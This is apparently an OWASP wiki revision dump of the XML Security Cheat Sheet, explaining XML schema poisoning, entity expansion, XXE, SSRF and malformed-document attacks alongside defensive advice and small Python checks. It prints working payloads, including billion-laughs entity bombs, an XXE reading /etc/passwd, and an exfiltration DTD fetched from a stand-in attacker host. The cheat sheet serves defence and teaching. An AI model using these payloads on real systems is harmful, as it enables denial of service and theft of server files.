  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read files from the server. This type of schema only serves as a suggestion for sending a document; to be used safely, there must be a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with the traffic. In the following example, the connection used to retrieve the schema could be sniffed and modified before the content reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 (10^10) characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, the application will start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt; that it contains; then each of these will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. In the end, the CPU and/or memory will be affected by expanding 10^9 (1,000,000,000) references to &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, which amounts to 3*10^9 (3,000,000,000) characters and could make the parser crash.&lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTDs within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:Envelope [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:Envelope entityReference=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:Body&amp;gt; &lt;br /&gt;
    &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:Body&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:Envelope&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
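&lt;br /&gt;
Rejecting any message that carries a DTD, as the SOAP specification permits, can be sketched with the expat binding from the Python standard library. This is a minimal illustration rather than a complete SOAP processor; the names DtdForbidden and parse_without_dtd are assumptions made for this example.&lt;br /&gt;

```python
import xml.parsers.expat


class DtdForbidden(ValueError):
    """Raised when a document carries a DOCTYPE declaration."""


def parse_without_dtd(payload):
    """Parse payload (bytes) with expat, aborting as soon as a DOCTYPE starts.

    Returns True when the document is well formed and contains no DTD.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called at the start of the DOCTYPE, before any entity is declared.
        raise DtdForbidden("DOCTYPE declarations are not accepted")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(payload, True)
    return True
```

Because the handler fires at the start of the declaration, the entity definitions are never processed and the expansion never takes place.&lt;br /&gt;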
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; that points to &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the contents of that file are expanded inside the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element where the entity is referenced. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve resources on the attacker's behalf, such as a local file or a remote file via HTTP/HTTPS/FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried, so you have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to a valid port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
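&lt;br /&gt;
The averaging step of the time-based approach can be sketched in Python as follows. The measurements are assumed to have been collected already; the function name classify_ports, the threshold, and the neutral labels are illustrative assumptions, since which timing corresponds to an open port depends on the implementation being tested.&lt;br /&gt;

```python
from statistics import mean


def classify_ports(samples, threshold_seconds):
    """Label each port "slow" or "fast" from its average response time.

    samples maps a port number to the list of response times, in seconds,
    measured for that port. Whether "slow" means open or closed depends on
    the implementation under test, so the labels are deliberately neutral.
    """
    labels = {}
    for port, times in samples.items():
        average = mean(times)
        labels[port] = "slow" if average > threshold_seconds else "fast"
    return labels
```

Taking more samples per port reduces the effect of network jitter on the average, which is why the technique degrades on higher latency networks.&lt;br /&gt;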
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the user information part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224426</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224426"/>
				<updated>2016-12-21T20:13:17Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To assess the likelihood of this attack, compare the time taken to process a regular XML document with the time taken to process a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
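&lt;br /&gt;
Such a comparison can be sketched with a small Python harness. It uses the expat binding from the standard library as a stand-in for whatever parser is actually deployed; the names best_parse_time and slowdown are assumptions made for this example.&lt;br /&gt;

```python
import time
import xml.parsers.expat


def best_parse_time(payload, repeats=5):
    """Return the fastest wall-clock time, in seconds, to parse payload once.

    Parse errors are expected for malformed input and are swallowed, because
    the time spent before the parser gives up is the quantity of interest.
    """
    best = None
    for _ in range(repeats):
        parser = xml.parsers.expat.ParserCreate()
        start = time.perf_counter()
        try:
            parser.Parse(payload, True)
        except xml.parsers.expat.ExpatError:
            pass
        elapsed = time.perf_counter() - start
        if best is None or best > elapsed:
            best = elapsed
    return best


def slowdown(regular, malformed, repeats=5):
    """Ratio of malformed to well-formed parse time; above 1 means slower."""
    baseline = max(best_parse_time(regular, repeats), 1e-9)
    return best_parse_time(malformed, repeats) / baseline
```

A ratio well above 1 for realistic document sizes suggests that malformed input is disproportionately expensive for the parser under test.&lt;br /&gt;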
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
